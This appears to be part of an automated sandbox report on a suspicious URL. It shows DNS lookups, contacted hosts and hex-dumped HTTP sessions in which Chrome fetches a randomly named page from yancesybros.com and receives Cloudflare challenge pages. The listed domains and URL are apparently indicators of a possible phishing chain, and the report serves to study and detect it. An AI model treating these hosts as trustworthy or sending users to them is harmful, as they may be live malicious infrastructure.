                                                    Nov 25, 2024 19:43:54.031232119 CET1.1.1.1192.168.2.40xe4d5No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:23.712100029 CET1.1.1.1192.168.2.40x4504No error (0)choicesff.com69.49.245.172A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:25.707885981 CET1.1.1.1192.168.2.40x2ff8No error (0)choicesff.com69.49.245.172A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:25.707918882 CET1.1.1.1192.168.2.40x6329No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:25.707918882 CET1.1.1.1192.168.2.40x6329No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:25.708838940 CET1.1.1.1192.168.2.40x41dcNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:27.924913883 CET1.1.1.1192.168.2.40x2c51No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:27.924913883 CET1.1.1.1192.168.2.40x2c51No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:27.938088894 CET1.1.1.1192.168.2.40xab00No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:28.235275030 CET1.1.1.1192.168.2.40x5879No error (0)nl.nsiciumbe.com65IN (0x0001)false
                                                    Nov 25, 2024 19:44:28.235358953 CET1.1.1.1192.168.2.40x5cf2No error (0)nl.nsiciumbe.com104.21.63.27A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:28.235358953 CET1.1.1.1192.168.2.40x5cf2No error (0)nl.nsiciumbe.com172.67.142.168A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:32.207237005 CET1.1.1.1192.168.2.40xacadNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:32.207237005 CET1.1.1.1192.168.2.40xacadNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:32.207237005 CET1.1.1.1192.168.2.40xacadNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:32.207237005 CET1.1.1.1192.168.2.40xacadNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.602977991 CET1.1.1.1192.168.2.40x94beNo error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.602977991 CET1.1.1.1192.168.2.40x94beNo error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.603359938 CET1.1.1.1192.168.2.40xf4e6No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.603471994 CET1.1.1.1192.168.2.40x6399No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.603471994 CET1.1.1.1192.168.2.40x6399No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.603471994 CET1.1.1.1192.168.2.40x6399No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:34.603471994 CET1.1.1.1192.168.2.40x6399No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:38.635586977 CET1.1.1.1192.168.2.40x60a7No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                    Nov 25, 2024 19:44:38.635586977 CET1.1.1.1192.168.2.40x60a7No error (0)googlehosted.l.googleusercontent.com172.217.19.225A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:38.638242006 CET1.1.1.1192.168.2.40xd357No error (0)blogger.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                    Nov 25, 2024 19:44:48.772583961 CET1.1.1.1192.168.2.40xe30fNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                    Nov 25, 2024 19:44:48.929738045 CET1.1.1.1192.168.2.40x400No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                    • yancesybros.com
                                                    • https:
                                                      • challenges.cloudflare.com
                                                      • choicesff.com
                                                      • cdnjs.cloudflare.com
                                                      • nl.nsiciumbe.com
                                                      • code.jquery.com
                                                      • blogger.googleusercontent.com
                                                    • a.nel.cloudflare.com
                                                    • fs.microsoft.com
                                                    • slscr.update.microsoft.com
                                                    • otelrules.azureedge.net
                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.449735172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:48 UTC673OUTGET /WHF9842BVD.html HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-platform: "Windows"
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-User: ?1
                                                    Sec-Fetch-Dest: document
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:48 UTC1285INHTTP/1.1 403 Forbidden
                                                    Date: Mon, 25 Nov 2024 18:43:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                    Cross-Origin-Embedder-Policy: require-corp
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Cross-Origin-Resource-Policy: same-origin
                                                    Origin-Agent-Cluster: ?1
                                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                    Referrer-Policy: same-origin
                                                    X-Content-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    cf-mitigated: challenge
                                                    2024-11-25 18:43:48 UTC886INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 57 6f 52 65 46 6f 45 48 37 76 73 5a 74 79 35 41 65 4a 67 70 79 32 78 70 39 35 56 51 62 36 62 7a 45 67 46 6f 78 68 37 6e 58 51 62 64 66 78 65 30 41 75 31 62 71 69 55 54 43 4f 33 6d 6c 44 31 39 34 63 64 62 69 78 62 75 6a 47 31 72 57 48 42 4d 48 77 71 33 73 78 4d 67 2b 46 4a 67 6d 74 70 76 68 6b 36 34 6f 38 2f 34 50 35 55 3d 24 77 47 52 6c 6b 37 35 42 44 54 44 2f 4d 31 76 67 4d 68 33 59 66 77 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                    Data Ascii: cf-chl-out: WoReFoEH7vsZty5AeJgpy2xp95VQb6bzEgFoxh7nXQbdfxe0Au1bqiUTCO3mlD194cdbixbujG1rWHBMHwq3sxMg+FJgmtpvhk64o8/4P5U=$wGRlk75BDTD/M1vgMh3Yfw==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                    2024-11-25 18:43:48 UTC567INData Raw: 32 33 36 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                    Data Ascii: 2365<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                                    2024-11-25 18:43:48 UTC1369INData Raw: 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 7d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 68 65 69 67 68 74 3a 31 30 30 76 68 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 7d 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 38 72 65 6d 20 61 75 74 6f 3b 6d 61 78 2d 77 69 64 74 68 3a 36 30 72 65 6d 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 31 2e 35 72 65 6d 7d 40 6d 65 64 69 61 20 28 77 69 64 74 68 20 3c 3d 20 37 32 30 70 78 29 7b 2e 6d 61 69 6e 2d 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 72 65 6d 7d 7d 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 66 6f 6e
                                                    Data Ascii: Emoji,Segoe UI Symbol,Noto Color Emoji}body{display:flex;flex-direction:column;height:100vh;min-height:100vh}.main-content{margin:8rem auto;max-width:60rem;padding-left:1.5rem}@media (width <= 720px){.main-content{margin-top:4rem}}.h2{font-size:1.5rem;fon
                                                    2024-11-25 18:43:48 UTC1369INData Raw: 75 65 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 61 6e 63 65 73 79 62 72 6f 73 2e 63 6f 6d 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 52 61 79 3a 20 27 38 65 38 33 63 39 35 33 37 61 65 66 63 33 32 35 27 2c 63 48 3a 20 27 79 62 6b 65 6d 4d 42 6f 32 73 70 4f 42 45 74 36 6a 33 46 36 2e 76 31 53 55 57 67 31 39 69 6b 6f 41 65 50 42 4d 4e 33 64 4d 37 67 2d 31 37 33 32 35 36 30 32 32 38 2d 31 2e 32 2e 31 2e 31 2d 6f 4f 4e 46 6a 6a 63 6d 72 44 31 73 61 57 45 79 41 6c 41 5a 74 39 59 30 56 4b 76 56 78 59 4b 37
                                                    Data Ascii: ue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt={cvId: '3',cZone: "yancesybros.com",cType: 'managed',cRay: '8e83c9537aefc325',cH: 'ybkemMBo2spOBEt6j3F6.v1SUWg19ikoAePBMN3dM7g-1732560228-1.2.1.1-oONFjjcmrD1saWEyAlAZt9Y0VKvVxYK7
                                                    2024-11-25 18:43:48 UTC1369INData Raw: 72 31 79 78 73 45 65 63 38 73 49 61 78 43 44 4d 4e 42 6f 4b 76 5a 59 53 5a 42 35 5f 6c 42 4a 45 44 50 57 6b 53 6f 31 65 52 79 4b 6a 7a 46 78 34 32 72 6a 69 76 69 55 77 67 49 64 71 58 74 68 53 62 4f 30 57 45 42 33 4f 32 55 71 33 7a 6a 31 30 57 58 6f 48 45 78 62 6a 37 2e 49 33 52 36 39 62 32 71 65 78 62 57 70 76 35 5a 5f 55 37 2e 6e 54 64 79 4e 54 64 36 30 67 39 6a 63 4d 43 4b 68 45 41 50 4b 48 65 66 4c 79 47 36 50 76 58 59 65 2e 37 5a 58 5f 50 48 6e 42 51 4c 58 6c 74 59 52 77 4f 79 4c 36 61 75 4b 74 66 73 38 65 4f 47 62 4f 50 49 6b 66 51 44 41 45 72 4b 43 54 6f 74 39 73 72 78 33 34 57 6a 36 68 35 39 7a 76 45 4f 34 66 78 6e 6f 38 43 31 67 64 45 69 6b 6b 7a 31 68 4d 42 31 7a 47 35 6f 74 50 47 71 54 37 77 30 4d 71 55 37 4f 4d 63 70 43 78 77 39 5f 42 66 67 65
                                                    Data Ascii: r1yxsEec8sIaxCDMNBoKvZYSZB5_lBJEDPWkSo1eRyKjzFx42rjiviUwgIdqXthSbO0WEB3O2Uq3zj10WXoHExbj7.I3R69b2qexbWpv5Z_U7.nTdyNTd60g9jcMCKhEAPKHefLyG6PvXYe.7ZX_PHnBQLXltYRwOyL6auKtfs8eOGbOPIkfQDAErKCTot9srx34Wj6h59zvEO4fxno8C1gdEikkz1hMB1zG5otPGqT7w0MqU7OMcpCxw9_Bfge
                                                    2024-11-25 18:43:48 UTC1369INData Raw: 2e 4e 6c 7a 55 6a 6d 6a 63 7a 4f 51 48 4f 6f 31 6f 37 38 67 5f 33 46 5a 76 48 58 47 76 6a 49 4f 70 74 75 5a 6f 32 36 76 46 4d 78 67 59 64 43 55 75 4f 79 67 79 76 30 74 4d 78 58 63 6d 6d 76 7a 62 6a 4f 67 74 44 49 36 55 69 59 65 78 48 44 4d 61 30 58 34 6a 49 46 71 39 54 64 4d 45 33 5a 6e 32 64 51 32 48 6a 51 50 43 45 6a 49 64 30 4b 44 49 64 50 53 36 32 6d 66 4b 6f 43 52 65 49 35 69 75 4a 67 66 4c 64 64 78 63 4d 47 52 69 76 48 6e 55 79 73 6d 6d 42 4f 57 66 50 65 73 5a 73 64 4f 41 72 72 5a 79 30 5a 68 63 4f 50 37 52 4a 67 42 55 46 71 33 73 53 6e 47 59 77 6f 4d 75 37 67 68 78 55 70 34 79 39 6f 42 53 7a 65 54 7a 61 48 6d 66 56 31 43 70 55 77 50 79 59 4d 4b 4d 59 48 64 6d 74 4b 49 78 72 50 39 61 4b 61 33 6b 4b 78 78 37 44 53 50 75 61 41 33 71 41 37 45 72 39 4c
                                                    Data Ascii: .NlzUjmjczOQHOo1o78g_3FZvHXGvjIOptuZo26vFMxgYdCUuOygyv0tMxXcmmvzbjOgtDI6UiYexHDMa0X4jIFq9TdME3Zn2dQ2HjQPCEjId0KDIdPS62mfKoCReI5iuJgfLddxcMGRivHnUysmmBOWfPesZsdOArrZy0ZhcOP7RJgBUFq3sSnGYwoMu7ghxUp4y9oBSzeTzaHmfV1CpUwPyYMKMYHdmtKIxrP9aKa3kKxx7DSPuaA3qA7Er9L
                                                    2024-11-25 18:43:48 UTC1369INData Raw: 4b 66 33 56 45 33 76 5a 7a 63 4c 72 75 50 76 4e 46 44 6f 73 36 4d 56 56 2e 54 46 44 63 49 55 6e 4d 52 78 49 4b 43 50 32 51 44 61 4d 76 50 52 41 65 4f 39 38 5a 69 69 46 42 69 32 6e 37 61 34 47 71 68 56 31 76 36 47 64 34 35 61 4a 51 59 44 4c 59 7a 73 4b 73 77 47 38 34 47 50 78 39 4c 74 63 6d 45 31 33 70 4e 48 43 5f 59 35 72 70 32 6f 69 55 6d 4c 44 68 35 45 51 37 50 4e 67 63 6f 41 39 43 69 2e 2e 32 53 70 77 61 77 44 4f 66 6e 43 5a 52 38 58 52 34 51 4e 61 51 54 78 62 77 77 41 61 76 4f 41 64 2e 6c 4c 6c 74 5f 43 39 37 7a 4d 53 42 72 6c 5f 42 47 6c 77 34 71 53 68 6f 71 48 32 6a 70 4c 73 73 37 6b 37 32 45 30 48 4b 31 53 56 6e 4a 4b 52 71 50 64 6d 75 44 42 2e 4e 32 46 43 73 66 42 38 42 55 52 57 5f 35 76 64 47 44 55 75 73 55 59 63 44 56 71 73 74 55 57 48 34 44 59
                                                    Data Ascii: Kf3VE3vZzcLruPvNFDos6MVV.TFDcIUnMRxIKCP2QDaMvPRAeO98ZiiFBi2n7a4GqhV1v6Gd45aJQYDLYzsKswG84GPx9LtcmE13pNHC_Y5rp2oiUmLDh5EQ7PNgcoA9Ci..2SpwawDOfnCZR8XR4QNaQTxbwwAavOAd.lLlt_C97zMSBrl_BGlw4qShoqH2jpLss7k72E0HK1SVnJKRqPdmuDB.N2FCsfB8BURW_5vdGDUusUYcDVqstUWH4DY
                                                    2024-11-25 18:43:48 UTC1369INData Raw: 4f 52 4c 58 38 58 62 56 6b 61 78 43 2e 5f 52 55 68 66 4f 71 38 4f 42 42 52 78 4a 77 6b 32 62 2e 49 6c 78 69 42 65 4d 50 55 64 30 53 43 49 71 68 58 44 41 79 46 4d 4a 33 72 4f 5f 5f 4a 4e 32 52 56 58 68 33 56 55 6e 72 32 72 7a 44 33 2e 71 66 68 4a 36 64 74 49 78 31 37 32 45 48 66 36 53 46 4d 66 31 36 68 4c 36 59 41 39 6b 34 2e 62 5a 51 77 67 38 6d 38 44 6f 4c 70 58 7a 66 4f 71 34 68 6c 66 47 6d 4f 77 36 30 5f 76 32 59 62 74 32 70 62 71 50 33 4b 35 6b 6c 39 70 52 46 35 61 6b 4d 75 38 57 65 65 77 53 42 69 6a 49 42 4c 4c 6f 46 6f 70 36 4e 6c 54 6e 4a 54 6a 44 72 6e 52 69 6e 7a 6d 6c 44 31 56 54 61 54 75 6e 6a 62 35 64 77 70 4a 33 44 75 47 2e 2e 37 48 4d 76 41 78 63 79 5f 47 38 6f 7a 32 75 5f 6e 55 38 37 67 53 2e 4f 76 6a 39 77 37 61 49 46 45 68 46 66 56 46 6c
                                                    Data Ascii: ORLX8XbVkaxC._RUhfOq8OBBRxJwk2b.IlxiBeMPUd0SCIqhXDAyFMJ3rO__JN2RVXh3VUnr2rzD3.qfhJ6dtIx172EHf6SFMf16hL6YA9k4.bZQwg8m8DoLpXzfOq4hlfGmOw60_v2Ybt2pbqP3K5kl9pRF5akMu8WeewSBijIBLLoFop6NlTnJTjDrnRinzmlD1VTaTunjb5dwpJ3DuG..7HMvAxcy_G8oz2u_nU87gS.Ovj9w7aIFEhFfVFl
                                                    2024-11-25 18:43:48 UTC288INData Raw: 5f 73 4d 5f 4d 4f 68 65 44 57 67 44 49 6f 6e 65 79 4e 73 35 48 4c 58 6d 6a 64 7a 74 5f 63 4d 73 67 58 63 4d 56 67 59 2d 31 37 33 32 35 36 30 32 32 38 2d 31 2e 30 2e 31 2e 31 2d 37 66 49 5f 69 4e 54 6b 66 67 76 2e 43 42 53 39 7a 7a 39 36 71 4d 53 4c 6e 39 61 73 4a 72 46 37 47 5a 47 6a 43 75 4b 6a 35 41 6b 22 20 2b 20 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 63 4f 67 55 48 61 73 68 29 3b 63 70 6f 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 68 69 73 74 6f 72 79 2e 72 65 70 6c 61 63 65 53 74 61 74 65 28 6e 75 6c 6c 2c 20 6e 75 6c 6c 2c 20 6f 67 55 29 3b 7d 7d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 63 70
                                                    Data Ascii: _sM_MOheDWgDIoneyNs5HLXmjdzt_cMsgXcMVgY-1732560228-1.0.1.1-7fI_iNTkfgv.CBS9zz96qMSLn9asJrF7GZGjCuKj5Ak" + window._cf_chl_opt.cOgUHash);cpo.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(cp
                                                    2024-11-25 18:43:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    1192.168.2.449736172.67.189.744432200C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-11-25 18:43:48 UTC945OUTGET /WHF9842BVD.html HTTP/1.1
                                                    Host: yancesybros.com
                                                    Connection: keep-alive
                                                    Upgrade-Insecure-Requests: 1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                    sec-ch-ua-mobile: ?0
                                                    sec-ch-ua-full-version: "117.0.5938.132"
                                                    sec-ch-ua-arch: "x86"
                                                    sec-ch-ua-platform: "Windows"
                                                    sec-ch-ua-platform-version: "10.0.0"
                                                    sec-ch-ua-model: ""
                                                    sec-ch-ua-bitness: "64"
                                                    sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                    Sec-Fetch-Site: none
                                                    Sec-Fetch-Mode: navigate
                                                    Sec-Fetch-User: ?1
                                                    Sec-Fetch-Dest: document
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en;q=0.9
                                                    2024-11-25 18:43:49 UTC1285INHTTP/1.1 403 Forbidden
                                                    Date: Mon, 25 Nov 2024 18:43:48 GMT
                                                    Content-Type: text/html; charset=UTF-8
                                                    Transfer-Encoding: chunked
                                                    Connection: close
                                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                    Cross-Origin-Embedder-Policy: require-corp
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Cross-Origin-Resource-Policy: same-origin
                                                    Origin-Agent-Cluster: ?1
                                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                    Referrer-Policy: same-origin
                                                    X-Content-Options: nosniff
                                                    X-Frame-Options: SAMEORIGIN
                                                    cf-mitigated: challenge
                                                    2024-11-25 18:43:49 UTC888INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 31 34 64 74 71 52 41 75 7a 70 31 39 52 49 4c 68 55 2f 5a 33 57 78 76 77 57 79 35 77 44 45 4e 43 30 49 5a 37 71 31 4d 35 46 71 4e 73 6a 52 77 4f 56 71 70 75 4f 53 42 79 75 68 63 32 46 75 33 73 5a 61 55 70 4c 44 34 72 57 63 77 54 77 59 5a 4b 51 37 77 54 4a 5a 79 59 65 44 4d 44 72 6b 5a 32 6e 53 6d 65 6b 38 55 43 43 48 6f 3d 24 47 71 79 35 64 4a 65 30 68 38 68 38 32 75 30 44 39 57 77 57 38 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                                    Data Ascii: cf-chl-out: 14dtqRAuzp19RILhU/Z3WxvwWy5wDENC0IZ7q1M5FqNsjRwOVqpuOSByuhc2Fu3sZaUpLD4rWcwTwYZKQ7wTJZyYeDMDrkZ2nSmek8UCCHo=$Gqy5dJe0h8h82u0D9WwW8g==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                                    2024-11-25 18:43:49 UTC1369INData Raw: 32 33 65 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                                    Data Ascii: 23e5<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
